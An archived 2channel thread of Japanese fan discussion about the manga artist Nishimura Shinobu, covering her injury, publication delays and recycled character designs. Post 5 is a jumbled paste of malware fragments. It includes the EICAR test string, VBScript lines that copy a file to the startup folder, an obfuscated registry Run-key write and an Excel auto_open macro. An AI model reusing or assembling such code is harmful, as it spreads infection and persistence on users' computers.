2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆西村しのぶ☆ Vol.1

1 :花と名無しさん:2007/10/10(水) 22:00:53 ID:hLj4Aouq0
西村しのぶ画伯のスレです。

落ちてから誰もスレ立てしないので、立てました。

下山手別館 http://www.asobiba.gr.jp/dress/
日記 http://dress.blog.ocn.ne.jp/sino/

 好きな人、嫌いな人、集まれ!!

2 :花と名無しさん:2007/10/10(水) 22:11:34 ID:???0
またやんのかー、と思いつつ
2

3 :花と名無しさん:2007/10/10(水) 22:33:00 ID:53/LjypnO
>>1
乙。

お〜久しぶりの画伯スレだ夏から記書いてたんだー

怪我してたから最近連載再開してなかったのか・・・また読みたいからガンガレ。

4 :花と名無しさん:2007/10/11(木) 00:53:03 ID:???0
1乙

ボルトの写真が痛そうでしたー

5 :花と名無しさん:2007/10/11(木) 05:52:14 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/10/11(木) 11:07:25 ID:RMutpWDt0
年内ライン再開希望

7 :花と名無しさん:2007/10/11(木) 14:52:39 ID:???0
正直、フィールヤングのバラエッセイは他の雑誌に書いて欲しい。コーラスとかに。

20〜30代の若い子用雑誌だし、
こちとら会社に缶詰めなのに園芸エッセイ読んでも何の役にも立たないよ。
『あー自由業や主婦はいいですなぁー』って感想しか出て来なくて癒しにもならない。

8 :花と名無しさん:2007/10/11(木) 20:10:48 ID:???0
>1
西村しのぶチキンレースやってたのに、とうとう立てちゃいましたね。

ところで、このスレは実質20スレ目ですから。

あと、スレ立てするなら、掲載誌などのテンプレもしっかり貼ろう。

西村しのぶ Ver.11
http://comic6.2ch.net/test/read.cgi/gcomic/1055774650/
西村しのぶ Ver.11
http://comic6.2ch.net/test/read.cgi/gcomic/1070890728/
西村しのぶver.13
http://comic6.2ch.net/test/read.cgi/gcomic/1095069474/
西村しのぶver.14
http://comic6.2ch.net/test/read.cgi/gcomic/1112228923/
西村しのぶver.15
http://comic6.2ch.net/test/read.cgi/gcomic/1123644002/
西村しのぶver.16
http://comic6.2ch.net/test/read.cgi/gcomic/1138134532/
西村しのぶver.17
http://comic6.2ch.net/test/read.cgi/gcomic/1151831024/
西村しのぶver.18
http://comic7.2ch.net/test/read.cgi/gcomic/1161700404/
西村しのぶver.19
http://anime2.2ch.net/test/read.cgi/gcomic/1168259164/

9 :花と名無しさん:2007/10/11(木) 23:00:18 ID:fq4mTn+uO
ガハ 原稿書いてるのかな?年内は掲載無理かなー 私もラインが見たいなー

日記みたけど知らないうちに怪我かー とりあえず
つ菊

10 :花と名無しさん:2007/10/11(木) 23:15:44 ID:???0
>>9
菊は亡くなった人で鶴が病人・怪我人じゃなかった?
この板だと違うのかー?

11 :花と名無しさん:2007/10/12(金) 16:36:39 ID:HFyx3fKw0
>>1
Vol.1にするなら、新とかつけろよ
中途半端すんあ


12 :花と名無しさん:2007/10/12(金) 22:30:59 ID:???0
>>1は立て逃げ?

13 :過去スレ:2007/10/12(金) 23:03:10 ID:???0
初代、西村しのぶ(行方不明)

西村しのぶ2
http://piza.2ch.net/log2/gcomic/kako/951/951135495.html
西村しのぶ3
http://mentai.2ch.net/gcomic/kako/960/960163019.html
西村しのぶVer.3.5
http://salad.2ch.net/gcomic/kako/965/965141596.html
西村しのぶVer.4
http://salad.2ch.net/gcomic/kako/979/979741068.html
西村しのぶ Ver.5
http://salad.2ch.net/gcomic/kako/987/987565500.html
西村しのぶ Ver.6
http://salad.2ch.net/gcomic/kako/990/990888254.html
西村しのぶver.7
http://comic.2ch.net/gcomic/kako/996/996579152.html
西村しのぶver.7.5(html化待ち)
http://comic.2ch.net/test/read.cgi/gcomic/1009639304/
西村しのぶ Ver.8
http://comic.2ch.net/gcomic/kako/1019/10191/1019183796.html
西村しのぶ Ver.9
http://comic.2ch.net/gcomic/kako/1031/10310/1031087939.html
西村しのぶ Ver.10
http://comic.2ch.net/test/read.cgi/gcomic/1039930947

14 :花と名無しさん:2007/10/12(金) 23:10:22 ID:???0
コーラス次号に「アルコール」

ケガはお気の毒だけど、さらに絵がひどくなるのか?
見るのがこわい…

15 :花と名無しさん:2007/10/13(土) 21:31:24 ID:???O
ひっさしぶりにライン読んだ
マフラーの話のリツコが嫌になるほどうざい
昔はなんかステキに思えたんだけどなあ…
そろそろ捨て時かな…

16 :花と名無しさん:2007/10/14(日) 03:56:22 ID:???0
救いは自分で『焼きもちやき』と認めている所と
カンちゃんに『あんたは勝手/自分は棚に上げて』と突っ込まれている所だよね。

あと高卒で25才にもなる経験の長いハナがピン打ちチェックを受けたり、
27才でバイヤーもろくに出来ない所を見て、人を育てられないんじゃ?と思った。
普通は二号店を任せたりするよね。

自分はO型の自称良い女上司に悩んでいてリツ子がだぶって読めなかった時期がある。
新人君と話していたら焼きもち灼かれて、15才も年下なのに現役ぶっていて気持ち悪かった。
リツ子と邦彦も実際目にするときしょいよ。

17 :花と名無しさん:2007/10/15(月) 16:36:17 ID:???0
リツコって27才なんだっけ?
自分も20代の頃は楽しく読んでたけど、30越えたらリツコが色々すごくうざくなって
でも好きだったこと考えるとまた読みたくなるんじゃ…と
見えない押し入れの奥に突っ込んでしまった。

18 :花と名無しさん:2007/10/18(木) 21:54:23 ID:???0
もうすぐ27歳でちょうど大学院生(森田剛似のまあまあイケメン)
に言い寄られてるけど絶対付合わないなあ。自分なら。
一歳でも年下と付合うなんて時間の無駄だと想うのに5歳も下なんて。
自分がおっさん好みってのもあるけど。
リツコとトシクニなんてもっと離れてるんじゃないの?
社会人と学生なんて価値観違いすぎて絶対ありえないね。男女逆ならともかく。

19 :花と名無しさん:2007/10/18(木) 23:30:11 ID:???0
>>18
それはあくまで「君がの場合」やな。
逆に年が離れ過ぎてるとなんかもうどーでもよくなってきて、
つきあうってのはある。
相手が子供なのも価値観が一致しないのも、既に
判りきってることだから。

まあ、うちの姉の話なんだが。

20 :花と名無しさん:2007/10/20(土) 15:00:22 ID:aqpf9camO
どうでもいいけど、トシクニって名前だったっけ。
まぁそれでもいっかw

21 :花と名無しさん:2007/10/20(土) 19:36:20 ID:???O
>>1 乙!自分スレ立てできないからありがたいッス。惜しむらくは、vol.1にしちゃったところかな。
サードガール以来ずっと好きだったが、あまりに絵と話作りが荒れたので、ファンとは言えなくなったが…
捨てられなくて箱詰めして押し入れに突っ込んでて、たま〜に読み返してる。
メデックスは中途半端なコミクスで腹立つけど。

22 :花と名無しさん:2007/10/20(土) 20:14:42 ID:gpMiWBZqO
トシクニってww
邦彦だよ〜。

23 :花と名無しさん:2007/10/20(土) 20:25:21 ID:???0
ラインの1巻でリツコは1968年生まれとか書いてなかった?いまいくつだよw
(リングに生年月日刻印してプレゼント?)

夜梨子も最初の頃は「昭和45年生まれ」みたいに書いてその内に消したけど
コンスタントにマンガ描けないんだからそういう設定に凝らなきゃいいのに…

24 :花と名無しさん:2007/10/20(土) 23:04:39 ID:???0
39才か......あのブレス作った時点で終れば良かったのにな。綺麗に纏まっていたのに。

25 :花と名無しさん:2007/10/21(日) 17:39:53 ID:???O
リツコって三十路だと思ってたんだけど…
まだ27歳なんだぁ…

邦彦の父親&親戚一同がリツコマンセーしているのが、なんか違和感覚えたなぁ…


26 :花と名無しさん:2007/10/21(日) 19:39:52 ID:???0
いや、三十路の筈だよ。
30過ぎてスーツ脱がすのが好きになったって台詞があった。

上の27才はハナの年齢を言ってるんじゃない?
最新のお仕事日記では『私はハナ27才』って書いてあったから。

27 :花と名無しさん:2007/10/21(日) 20:16:21 ID:???O
じゃあ、邦彦とリツコの年齢差って10歳以上…
世間的にはヒモと思われてもおかしくないよな

28 :花と名無しさん:2007/10/24(水) 21:17:31 ID:???O
アルコールのユキは深夜バイトして、酒びたり…ちゃんと卒業できるのか?

29 :花と名無しさん:2007/10/25(木) 05:41:19 ID:???O
ユキって将来ミカン農家継ぐために農業の専門書読みあさっているようだけど…
どう見ても農学部とかじゃないよね〜国文学科とか英文科とか、社会学科とかそんな雰囲気

30 :花と名無しさん:2007/10/25(木) 16:09:19 ID:???0
ミサオが国文科で一緒に授業受けてるけど、ユキちゃんも国文なのかな?

31 :花と名無しさん:2007/10/28(日) 08:21:20 ID:???0
以前からモヤモヤしてたんだけど…
【社会】 "原則輸入禁止のマンゴー持ち込まないで" 成田空港で検疫没収 3年連続最多
http://news22.2ch.net/test/read.cgi/newsplus/1193452122/

ミサオのあれはやっぱり違反…?

32 :花と名無しさん:2007/10/28(日) 14:41:09 ID:???0
>31
私もそれ見てミサオ思い出したw
ガハキャラだもん密輸入だよきっと。

33 :花と名無しさん:2007/10/28(日) 16:00:16 ID:???0
植物と一緒に害虫を持ち込んで国内に広めてしまう恐れがあるから駄目なのか…
でも作品内グルメ空輸団は毎回植物検疫が約束なんだろう
とアルコールファンの自分が言ってみる

34 :花と名無しさん:2007/10/28(日) 18:10:10 ID:???0
日本の植生を侵すような虫のもちこみをユキちゃんが許すなら
とんだ素人みかん山フェチですが、さて。

35 :花と名無しさん:2007/10/28(日) 18:23:54 ID:???O
1巻でユキは目的があってお金貯めているという設定だったけど…
それがミカン山の手入れ資金っていうのは…唐突さを感じたなぁ
いきあたりばったりな設定だと思う、ミカン山

36 :花と名無しさん:2007/10/28(日) 19:30:40 ID:???0
週末だけ田舎暮しがしたい都会人と同じような気がする。
「ミカン山の手入れ&自分の望むライフスタイル」を
実現させてくれるようなパトロンを探した方が
早いんじゃないの?と思うんだけど…
500万くらいでみかん山の修繕ってできるのだろうか?とも。

今回、唐突に農協職員の人が出てきて驚いた。

37 :花と名無しさん:2007/10/28(日) 20:07:05 ID:???0
>>34
虫のもこみち、に見えた

38 :花と名無しさん:2007/10/28(日) 21:49:05 ID:???0
>>37
お前は俺か

39 :花と名無しさん:2007/10/29(月) 02:00:04 ID:???O
1巻はタイトル通りお酒がテーマだったけど、2巻はなぜか禁煙がテーマに…w
この先どんな展開になるのやら…

40 :花と名無しさん:2007/10/29(月) 14:12:43 ID:???0
>1000 名前:花と名無しさん[sage] 投稿日:2007/07/11(水) 18:16:09 ID:???0
>要らんか

まるまる3ヶ月放置かwww
なのにこの生命力はまるで作者のようだw

41 :花と名無しさん:2007/10/29(月) 19:41:52 ID:???0
農協職員の人とショーコの彼氏と区別がつかん…

42 :花と名無しさん:2007/10/29(月) 22:13:38 ID:???0
>>41
マキちゃん兄との区別もつかないや…

43 :花と名無しさん:2007/10/29(月) 22:43:09 ID:???0
>>41
美有の彼氏も似たような感じだっけ?

44 :花と名無しさん:2007/10/30(火) 17:46:07 ID:???0
メガネ男はどれもそんな感じだねw

45 :花と名無しさん:2007/10/30(火) 23:15:48 ID:???O
今回のコーラスって落ちたんだよね?あれ

46 :花と名無しさん:2007/10/31(水) 03:57:45 ID:???0
>>41-44
ちょっとずつ違うの!w

47 :花と名無しさん:2007/10/31(水) 16:32:24 ID:???0
こんどはメガネ牧場かよwww

48 :花と名無しさん:2007/10/31(水) 19:36:13 ID:???0
四様にでもはまったのかなw

49 :花と名無しさん:2007/11/01(木) 00:28:52 ID:???0
前スレ保存したかった


50 :花と名無しさん:2007/11/01(木) 15:35:39 ID:???0
邦彦の兄みたいなのが全部の作品に出てたような
あと邦彦とミサオ彼氏みたいなのも標準装備

51 :花と名無しさん:2007/11/01(木) 17:36:50 ID:???0
みかん山なめんなよ!>ユキ
旦那の実家は愛媛で兼業でミカン作ってるが、
年中草刈りや消毒やらで義父は右膝に水が溜まっている。

52 :花と名無しさん:2007/11/02(金) 10:56:42 ID:???0
この人の書くおっさんってなんてみんなメガネなんだ?
リツコの元上司とかミサオの店のバーテンとか店の客とか。

ついでに邦彦の兄ちゃんと松本なんて同一人物かと思ったぞ。
あ、ちょっとずつ違うのか。いや全然違わないぞ。

53 :花と名無しさん:2007/11/02(金) 15:42:07 ID:???0
メガネでもいいけど、みんなクローンのような顔に背格好で並んで座ってるので
ゲンナリする。

54 :花と名無しさん:2007/11/02(金) 18:01:21 ID:???0
みんなネクタイが斜めストライプだしww

55 :花と名無しさん:2007/11/02(金) 20:48:11 ID:???O
キャラのバージョンが激少ないのがガハの特徴ですw

56 :花と名無しさん:2007/11/02(金) 22:24:24 ID:???0
中年の男性が年相応に見えないのがなぁ…シワが有るか無いかだけで全員一緒だ。

57 :花と名無しさん:2007/11/03(土) 04:00:23 ID:???O
岡崎某のカウンタックを読んだ
既視感ってこういう事なのか


時期的にはどちらが先なんだろう?
VOICEを実家に行って漁って来よう

58 :花と名無しさん:2007/11/03(土) 07:04:11 ID:???0
>57
同氏の「かれんちゃん」シリーズを読んだ弟の感想。
「この子(かれんちゃん)美紅のまんまじゃん」

同じなのは髪型くらいだと思うんだけど
なんとなくそう感じたらしい。

59 :花と名無しさん:2007/11/03(土) 12:17:28 ID:???O
>>58
共通
制服がブレザー
靴はローファー
おかっぱ

違い
かれんちゃんはトーン頭
ミクはベタ処理頭

ちょっとずつ違うのよ

60 :花と名無しさん:2007/11/07(水) 22:29:17 ID:???0
コーラス読んだけどユキみかん山舐めてるだろ
そして農協の人がLINEで邦彦に絡んでた男に似てる
てか同じ人だろ


61 :花と名無しさん:2007/11/08(木) 19:53:05 ID:???O
ガバのキャラが同じ顔(ちょっとずつ違う)なのは、もうよ〜くわかった。
医者ネタも南の島ネタも洋服屋ネタも…掘り下げが足りないんだよなぁ。
何を呼んでも物足りないと感じる。

62 :花と名無しさん:2007/11/08(木) 20:27:13 ID:???0
ちょっとずつ違わなくていいから一本のマンガにしてくれw
一話完結で、そのつど主人公替えて書けばいいじゃないかw

63 :花と名無しさん:2007/11/09(金) 01:41:02 ID:???O
まだ医学生マンガは、現役医学生に取材した成果か、ガハ作品の中では読み応えある。
でも、それ以外はガハの日常から抜け出されていないんだよね…
ガハの体験談的ゆったりマンガ。
いい加減飽きるよ…

64 :花と名無しさん:2007/11/09(金) 01:45:40 ID:???0
医学生漫画も臨床と基礎の方向性の違いがわかってないけどねー

65 :花と名無しさん:2007/11/09(金) 08:59:57 ID:???0
>63
だからこそ、続かなかったんだろうなー。

66 :花と名無しさん:2007/11/09(金) 17:25:33 ID:???0
40代のガハが普段してることを女子大生のユキとミサオに
やらせるから何かしっくり来ないんだよ
ユキは27歳OLて雰囲気

67 :花と名無しさん:2007/11/09(金) 19:26:50 ID:???O
>66
なるほど納得したわ。



ユキってば、毎日ぶ厚い豚肉と酒で、あのカラダを維持しているってあたり、メルヘンな設定だよね〜
採血したらドロドロしてそうだ…

68 :花と名無しさん:2007/11/09(金) 19:40:28 ID:z5gowYjW0
発売予定のイラスト集まだ?
予定通りに遅れてるのな

69 :花と名無しさん:2007/11/09(金) 19:46:36 ID:???O
骨折してるしね。

70 :花と名無しさん:2007/11/09(金) 20:57:43 ID:???0
>>67 ユキはお水の女子大生。
同伴やアフターで客と外食するから普段は小食なんでないの?

あれを美人の日常食と勘違いして真似する女子がいたら大変だよね。
パンと豚と芋とサラダ菜だけなんて普通なら明らかに栄養方寄ってるよ。

71 :花と名無しさん:2007/11/09(金) 21:11:07 ID:???O
あの冷蔵庫の様子からして、ちゃんとした自炊はやってないよね、ユキちゃん。
ホステスしているから、水仕事は極力避けてそうだし。
…こんな女と結婚したら大変なことになりそうだ。


でもガハの設定じゃあ、こんなユキでも結婚したら良妻賢母になるみたいなことになりそうだなw

72 :花と名無しさん:2007/11/09(金) 21:42:30 ID:???0
コーラスの「アルコール」が5枚でビックリした
肩怪我してるから仕方ないけど

73 :花と名無しさん:2007/11/09(金) 21:59:19 ID:???0
学生&ホステスバイトだとあの肉はいつ食べるんだろう?
昼と夜のバイト掛持ちしてたことあるけど、夜はバイト行く前に
あんな豚肉食べようなんて思わないし。
同伴だと食べる時間なんてないよ。
ユキは朝はタバコ、昼は学食ぽい(あるいはお茶)から謎だよ。

74 :花と名無しさん:2007/11/09(金) 22:09:48 ID:???0
夜中w

75 :花と名無しさん:2007/11/09(金) 23:08:04 ID:???O
夜中に、酒の肴に豚肉のステーキですね☆
到底真似できん。

76 :花と名無しさん:2007/11/10(土) 12:52:20 ID:sfkpHqcG0
週三日のバイトとあったからミサオの家の休肝日を覗いて、
残り3日をあの食事で済ませてるんじゃないかな。
ここまで予想付いちゃう自分キモスorz

知らない世界を垣間見れて楽しい事は楽しいけど
遭難も農業ネタだったし食傷気味。

77 :花と名無しさん:2007/11/10(土) 19:29:24 ID:ubFmysuF0
1日1食だったら
好きなだけ食べても太らないという
ブックスダイエットをしてるんじゃないの。

「見えないところで節制している」
というセリフもあったし。


78 :花と名無しさん:2007/11/11(日) 01:10:36 ID:???0
赤味の肉では太らないんじゃなかったっけ。タンパク質は主に血や骨つくるのに使われ云々
とどっかで読んだ気がする。豚ロースなら脂身取り除きやすいし。

79 :花と名無しさん:2007/11/11(日) 03:12:04 ID:???O
ガハ、豚肉よりラムにすれば良かったのにね。
つーかサドガの印税でコート買うとかさぁ、いい加減萎える
あの本、浮き出た部分が臭いから読めない

80 :花と名無しさん:2007/11/11(日) 09:30:39 ID:???0
読者=金づるとしか思ってない感がありありなんで
この人のエッセイ系は読む気になれない。

81 :花と名無しさん:2007/11/11(日) 12:38:23 ID:???0
エッセイもプログも
DQNぶりを楽しむためだから良いんじゃないの?
ああなっちゃいかん、みたいに

82 :花と名無しさん:2007/11/11(日) 13:10:17 ID:???0
何を読んでも体験談と言うより憧れにしか見えないんだよね。
「こんな女はカッコイイイ」と思い込む気持ちを
まるで小学生の落書きみたいに書き散らかしているだけみたいな。
自分の脳が中二病に近かった頃は面白かったんだけどな。

83 :花と名無しさん:2007/11/12(月) 22:09:38 ID:???O
多分漫画の方をきちんと連載、コミックを予定通り出してればこんなにも言われないんだろうなw
しかしラインの新刊どうなったんだろ…いい加減読みたいよ

84 :花と名無しさん:2007/11/13(火) 11:09:28 ID:???0
こんだけマンガ原作のドラマが隆盛なのに、声も掛けてもらえねーなあ。

85 :花と名無しさん:2007/11/13(火) 14:03:47 ID:???0
だって内容がない漫画ばかりだもん。今更サードガールっていうのも変だし。
脚本が難しいでしょ。ブランド物着て年下の犬飼って・・・で?それから?って感じだし。

86 :花と名無しさん:2007/11/13(火) 14:37:28 ID:???0
ドラマ化で改悪が目立つわけだが、このぐらい内容がないとかえって演出しやすいかもしれん。

87 :花と名無しさん:2007/11/13(火) 17:01:36 ID:???0
深夜か夕方の再放送枠で10分〜15分ぐらいでゆる〜くやると案外ウケるかも。

88 :花と名無しさん:2007/11/13(火) 17:28:05 ID:???O
サドガのイメージアルバムが出た頃は、このままアニメ化かドラマ化とも思ったけど…
サドガの時代は黒電話だからなぁ…

89 :花と名無しさん:2007/11/13(火) 17:35:46 ID:???0
一緒に遭難の1巻だけとか、アルコールの1巻だけとか
オチのないユルユルドラマでw

90 :花と名無しさん:2007/11/13(火) 17:50:47 ID:???0
やっぱり猫が好きみたいな感じで?
サドガなら有閑倶楽部も改悪でやってるし、ピンクハウスを何に特化するかだな。
やっぱりゴスロリ?

91 :花と名無しさん:2007/11/13(火) 17:59:06 ID:???0
ピンクハウスはあのままでもいいかもw
ゴスロリにしてAKBなんとかいうアイドルとかに猫耳つけて出されたらどうしようと思うw


92 :花と名無しさん:2007/11/13(火) 18:25:22 ID:???O
一緒に遭難ならドラマ化してもいいかも…


93 :花と名無しさん:2007/11/13(火) 19:25:08 ID:???0
ゴスロリのヨリが、「涼さん!」じゃなくて「お兄ちゃん!」とか言わされそうでイヤンw

94 :花と名無しさん:2007/11/13(火) 19:51:38 ID:???0
3丁目の夕日か、バブルへGO!みたいになるのか?

95 :花と名無しさん:2007/11/13(火) 20:10:06 ID:???0
バブルへGO!のノリだったら面白いかも。

96 :花と名無しさん:2007/11/14(水) 02:36:14 ID:???0
>>94-95
「GO!」って、ちゃんとエクスクラメーションつけるお前らが可愛いと思った。

97 :花と名無しさん:2007/11/14(水) 10:57:59 ID:???0
せいぜいバブルへGO!の登場人物が読む漫画として登場する程度でオケ。

98 :花と名無しさん:2007/11/14(水) 22:19:40 ID:???0
日記によると「10/30に原稿入稿」だそうだが何の原稿なんだ?
ニュータイプくらいしか思いつかないんだが…


99 :花と名無しさん:2007/11/14(水) 23:27:22 ID:m1i0Tw850
フィーやンのエッセイじゃない?

100 :花と名無しさん:2007/11/15(木) 00:03:16 ID:???O
早くライン4読みたいでーす

101 :花と名無しさん:2007/11/16(金) 10:42:30 ID:???O
私も!私も!
たしか5月?発売予定だったよね。
てか毎度出る話だけど、なんで5月のものがこんなに遅れるのか嫌味でなく本気で謎。

102 :花と名無しさん:2007/11/16(金) 12:43:29 ID:???0
スレ復活オメ!!

103 :花と名無しさん:2007/11/19(月) 05:01:09 ID:???O
あげ

104 :花と名無しさん:2007/11/19(月) 14:24:59 ID:???O
香川の事件の父親がニュー速で『画伯』と呼ばれてて、
わかっちゃいるけど、このスレが思い浮かんだ。

105 :花と名無しさん:2007/11/19(月) 14:28:55 ID:???0
黒のタンクトップ着た画伯でしょw

106 :花と名無しさん:2007/11/19(月) 15:48:53 ID:???O
>>101

単行本だすときに絵柄を書き直すことがあるようで、画伯は美意識が高いから修正しまくりなんでは(*^-^)b
お正月中にライン読みたいんですけどね〜。

107 :花と名無しさん:2007/11/19(月) 17:11:18 ID:???O
>>106
>単行本だすときに絵柄を書き直すことがあるようで、
雑誌のときは真っ白なコマにセリフひとつだけなのを、キャラの顔描き足したり、背景や小物入れたり、トーン貼ったり、ベタ塗ったり…色々大変なんだよwww

108 :花と名無しさん:2007/11/19(月) 17:34:43 ID:???0
単行本と比べてみると雑誌掲載時がいかに白かったのか分かるよね
お前はt(ry かと

109 :花と名無しさん:2007/11/19(月) 19:20:15 ID:???0
加筆してなおあの白さだからな…w
どのマンガも背景は同じだし。アシスタントって何してるんだろう?

110 :花と名無しさん:2007/11/19(月) 19:42:46 ID:???O
画伯のマンガってベタほとんど無いもんね〜
どこまでも真っ白〜
サドガの初期の背景書き込みっぷりが懐かしい〜

111 :花と名無しさん:2007/11/19(月) 20:43:02 ID:???O
余白の美ならぬ画伯のブ…

112 :花と名無しさん:2007/11/20(火) 19:46:43 ID:???O
画伯の絵をリアルタイムで見たことがないため、違いがわかりませんが今はアルコールをコーラスで拝見してますう。
毎回じゃないけどアルコールだけ切り抜き保存してます。
かなりマニアックなファンかしらん。

113 :花と名無しさん:2007/11/22(木) 04:52:51 ID:2MoScB6TO
>>112 ガバの作品は、いつコミクスになるかわからないから、ファンならそうするのが普通かと。

114 :花と名無しさん:2007/11/22(木) 10:56:04 ID:???O
>>113

あ〜そうですね〜
これは失礼しました。
まだまだ甘いですね〜
画伯の情報ありましたら是非ご紹介下さい。


115 :花と名無しさん:2007/11/22(木) 15:25:29 ID:???0
>>113
いやいやいやいやw

116 :花と名無しさん:2007/11/22(木) 23:40:30 ID:???O
ユキさんのルックスは画伯がモデル?

117 :花と名無しさん:2007/11/24(土) 04:00:00 ID:???O
ユキって、田舎育ちのくせに、都会風のお嬢様気取って、ブランド買いあさり、バイトはホステス。
同性から敬遠されるタイプだな…
いくらみかん山のためにカネ貯めたいからって、ホステス選ぶなよって感じ。


118 :花と名無しさん:2007/11/24(土) 04:16:06 ID:???0
せめてユキが農学部の学生ならグダグダの設定も許せるけどねー

119 :花と名無しさん:2007/11/24(土) 07:48:44 ID:???O
え 違うの!?

120 :花と名無しさん:2007/11/24(土) 08:06:32 ID:???O
でてくる男の子がロン毛ばかり〜
画伯、相当お好きなんですな



121 :花と名無しさん:2007/11/24(土) 12:22:57 ID:???0
短髪描くよりラクだから かもよ。

122 :花と名無しさん:2007/11/24(土) 15:57:29 ID:???0
一緒に遭難読み返した。

クリスタ長堀(地下)にあるパリ風(というかパリのをそのまま持ってきた)カフェで
お茶するエイコとキリエなんだけど、ここは紅茶メニューが弱いとか
何とか言ってたけど、そこパリですから。
パリはコーヒーですから。紅茶の事をそこで語るな。
コーヒーだってお茶なのに紅茶のことばっかかよてめーら。
老後にカフェ本書きたいならもっと勉強しろと思った。




123 :花と名無しさん:2007/11/24(土) 18:34:24 ID:???O
>118
ホステスになったのも高給&酒飲み放題だったはず。
そんな女に惚れちゃったあの純情サラリーマン可哀想…
最後は「私と結婚したいならいまの仕事辞めて、和歌山の田舎でみかん育てるのよ、おほほ」で、捨てられるか、エリート職辞めさせるかだと思う。

>120
本屋に行けば、最新の男性ヘアカタログいっぱい手に入るのにね、画伯。いまどきあのロンゲはないでしょう…

124 :花と名無しさん:2007/11/24(土) 19:29:23 ID:???0
みかん山は完全に後付けですな

125 :花と名無しさん:2007/11/24(土) 23:08:10 ID:???O
純情青年にライバル出現は後付けっぽいな〜と。
ロンゲよりちょっとミディアムな感じの青年を描いて〜♪


126 :花と名無しさん:2007/11/25(日) 11:59:44 ID:???0
だいたいどれもこれもきっちり完結するんだろうか?
「主人公の愛が地球を救うと信じて・・・!ご愛読有り難うございました!!」
って、冒険は始まったばかりだ系の終了になったりするんでは。

いや、冒険活劇ではないんだけれどもね、例え話でね。

127 :花と名無しさん:2007/11/25(日) 13:03:24 ID:???O
ひとつくらい完結を読みたいな。
サドガのタイトルの意味は三番目に出会う人と結ばれるみたいなことを画伯も言ってたし。まだ終わってないよと…
まあずいぶん昔の作品だからいまどきに合わないのかもしれないけど。

128 :花と名無しさん:2007/11/25(日) 13:22:09 ID:???0
みくまいとかすりっぷとか終わってるのあるよ

129 :花と名無しさん:2007/11/25(日) 14:38:43 ID:???0
アルコールと一緒にとあとなんだっけ…
一つにまとめても全然大丈夫だからあちこちで
同じような連載しないでほしい。
でもお金のためなら仕方ないか、ガハ。

130 :花と名無しさん:2007/11/25(日) 15:10:55 ID:???O
ライン再開期待!

131 :花と名無しさん:2007/11/25(日) 15:17:13 ID:???O
ガハの絵、大好き〜個人的にはラッシュのリツコさんやアルコールのマリアさんとか好き。
キャラ的にはひよこちゃんかわいい。

132 :花と名無しさん:2007/11/25(日) 17:20:39 ID:???O
リツコはライン
ラッシュなら百合

133 :花と名無しさん:2007/11/25(日) 17:27:28 ID:???O
>>132

百合の友達はりつこ

134 :花と名無しさん:2007/11/26(月) 08:13:25 ID:???O
みやさんは工学部まででたのになんで洋服売ってるのかが不思議〜
アパレルやお水、物書き以外で成功してる女性を書いて〜


135 :花と名無しさん:2007/11/26(月) 17:45:00 ID:???O
その昔、ガハが描くと雑誌がつぶれるという伝説があったな…

136 :花と名無しさん:2007/11/26(月) 18:37:24 ID:???0
Kissはちょっとやばいぞw
のだめで持ってる感じするし

137 :花と名無しさん:2007/11/26(月) 19:26:58 ID:???O
>134
せっかく工学部出たのにもったいないよね〜
まぁ、80年代の工学部卒のおなごは工学関係の会社採用は少なかったのかもね。

138 :花と名無しさん:2007/11/26(月) 20:00:40 ID:???0
KISS次号でキリマキ掲載。
マキちゃん出るのかわからんけど…


139 :花と名無しさん:2007/11/26(月) 22:19:10 ID:???O
>>138

> KISS次号でキリマキ掲載。


え☆
読まないと
連載再開じゃなくてピンポイントで?
どこで何の連載をしていたかも知らないにわかファンですが。

140 :花と名無しさん:2007/11/27(火) 14:27:01 ID:???O
画伯はイラストエッセイを描けばいいのに

141 :花と名無しさん:2007/11/27(火) 15:54:07 ID:???0
ヒント:下山手ドレス

142 :花と名無しさん:2007/11/27(火) 21:09:54 ID:???O
別館なら買いましたが…


143 :花と名無しさん:2007/11/27(火) 23:59:19 ID:???O
>>131-133
リツコ「さん」って言われたらラインっぽいよな
RUSHのはり「っちゃん」って感じ。
実際そういう呼ばれ方だし。
てか、作品数そんなに多くもないんだから、キャラの名前被らせるなよガハ…
長年絵と雰囲気が好きだったが、
さすがに先日のアルコールにはポカーンだった。

144 :花と名無しさん:2007/11/28(水) 00:56:16 ID:???0
なんであんなにキャラの名前をかぶせるのかわからない…
面白いのかな

145 :花と名無しさん:2007/11/28(水) 02:19:42 ID:???0
ヤフオクでサイン入りテレカ3万とかありえへんwwwww

146 :花と名無しさん:2007/11/28(水) 06:21:16 ID:???O
三千円でも高いと思うw

147 :花と名無しさん:2007/11/28(水) 08:56:37 ID:???O
>>143

確かにアルコールがっかり
背景と人物の大きさがあってなかったり、顔が雑っぽい。
怪我のせいかもしれないけど、たまにしか読めない画伯のマンガを楽しみにしてるんです。
リツコって名前、好きなのか…?

148 :花と名無しさん:2007/11/28(水) 16:41:55 ID:???0
昔ぱふのインタビューで、
マ行やラ行から始まる名前が好きって言ってた。
ヤ行もだったかな?
好きな名前ばっか使うからかぶるんだろうなー。

149 :花と名無しさん:2007/11/28(水) 18:40:56 ID:???O
キャラの名前も顔も髪型も設定も話もどれも似たようなのばっか…

150 :花と名無しさん:2007/11/28(水) 18:44:10 ID:???0
リツコとか好きな名前なんだろうね。
でも変に夜路死苦系のDQNネームつけられるよりいいかw


